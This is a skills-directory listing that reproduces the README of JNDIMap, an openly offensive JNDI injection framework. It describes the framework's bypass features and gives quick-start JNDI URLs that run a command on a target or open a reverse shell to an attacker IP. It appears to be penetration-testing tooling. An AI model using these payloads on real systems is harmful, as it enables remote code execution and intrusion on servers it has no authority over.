SkillAgentSearch skills...

JNDIMap

A powerful JNDI injection exploitation framework that supports RMI, LDAP and LDAPS protocols, including various bypass methods for high-version JDK restrictions

GenerateConvertImprove

Install / Use

/learn @X1r0z/JNDIMap
About this skill

Quality Score

0/100

Supported Platforms

Universal

README

<div align="center"> <img src="img/logo.png" width="128" /> <h1 align="center">JNDIMap</h1> </div> <p align="center"> <img alt="GitHub Repo stars" src="https://img.shields.io/github/stars/X1r0z/JNDIMap"> <img alt="GitHub forks" src="https://img.shields.io/github/forks/X1r0z/JNDIMap"> <img alt="Static Badge" src="https://img.shields.io/badge/Java-8-blue"> <img alt="GitHub Downloads (all assets, all releases)" src="https://img.shields.io/github/downloads/X1r0z/JNDIMap/total"> <img alt="GitHub Release" src="https://img.shields.io/github/v/release/X1r0z/JNDIMap"> <img alt="GitHub License" src="https://img.shields.io/github/license/X1r0z/JNDIMap"> <p align="center"> JNDIMap 是一个强大的 JNDI 注入利用框架, 支持 RMI、LDAP 和 LDAPS 协议, 包含多种高版本 JDK 绕过方式 </p> <p align="center">简体中文 | <a href="README.en.md">English</a></p> </p>

🚀 快速上手

Releases 页面下载 JNDIMap, 运行时传入 -i 参数指定外部 IP

java -jar JNDIMap-version.jar -i 10.0.0.1

在目标机器上执行命令或反弹 Shell

rmi://10.0.0.1:1099/Basic/Command/open -a Calculator
ldap://10.0.0.1:1389/Basic/ReverseShell/10.0.0.1/1337

🚩 功能特性

  • DNSLog
  • 命令执行
  • 反弹 Shell
  • Meterpreter 上线
  • 加载自定义 Java 字节码
  • 内存马注入 (基于 MemShellParty)
  • 高版本 JDK 绕过
    • BeanFactory 绕过 (Tomcat/Groovy/XStream, etc.)
    • JDBC RCE (MySQL/PostgreSQL/H2/Derby, etc.)
    • Tomcat Blind XXE
    • Hessian RCE
  • LDAP 反序列化 (包含常用 Gadget)
  • Nashorn JS 自定义 JNDI Payload
  • LDAP trustSerialData 绕过
  • JShell Payload 绕过 (可替代 Nashorn JS Engine)
  • UTF-8 Overlong Encoding 绕过

📖 使用指南

完整文档: USAGE.md

⚙️ 编译

Releases 包含稳定版和 snapshot 版 (基于 main 分支自动构建的最新版本), 你也可以在使用时拉取源码自行编译

# JDK 8+
git clone https://github.com/X1r0z/JNDIMap && cd JNDIMap
mvn package -Dmaven.test.skip=true

📷 参考 & 致谢

https://tttang.com/archive/1405/

https://paper.seebug.org/1832/

https://xz.aliyun.com/t/12846

http://www.lvyyevd.cn/archives/derby-shu-ju-ku-ru-he-shi-xian-rce

https://y4tacker.github.io/2023/03/20/year/2023/3/FastJson 与原生反序列化/

https://y4tacker.github.io/2023/04/26/year/2023/4/FastJson 与原生反序列化-二/

https://www.yulegeyu.com/2022/11/12/Java 安全攻防之老版本 Fastjson 的一些不出网利用/

https://gv7.me/articles/2020/deserialization-of-serialvesionuid-conflicts-using-a-custom-classloader/

https://www.leavesongs.com/PENETRATION/use-tls-proxy-to-exploit-ldaps.html

https://exp10it.io/2025/03/h2-rce-in-jre-17/

https://forum.butian.net/share/4414

https://yzddmr6.com/posts/swinglazyvalue-in-webshell/

https://mogwailabs.de/en/blog/2024/12/jndi-mind-tricks/

https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html

https://github.com/Whoopsunix/utf-8-overlong-encoding

🌟 Star History

<a href="https://www.star-history.com/#X1r0z/JNDIMap&Date"> <picture> <source media="(prefers-color-scheme: dark)" srcset="https://api.star-history.com/svg?repos=X1r0z/JNDIMap&type=Date&theme=dark" /> <source media="(prefers-color-scheme: light)" srcset="https://api.star-history.com/svg?repos=X1r0z/JNDIMap&type=Date" /> <img alt="Star History Chart" src="https://api.star-history.com/svg?repos=X1r0z/JNDIMap&type=Date" /> </picture> </a>

404 星链计划

<img src="https://github.com/knownsec/404StarLink/raw/master/Images/logo.png" width="30%">

JNDIMap 现已加入 404 星链计划

X1r0z

View profile

View on GitHub
GitHub Stars573
CategoryCustomer
Updated15d ago
Forks39
X1r0z/JNDIMap

Languages

Java

Security Score

100/100

Audited on Mar 15, 2026

No findings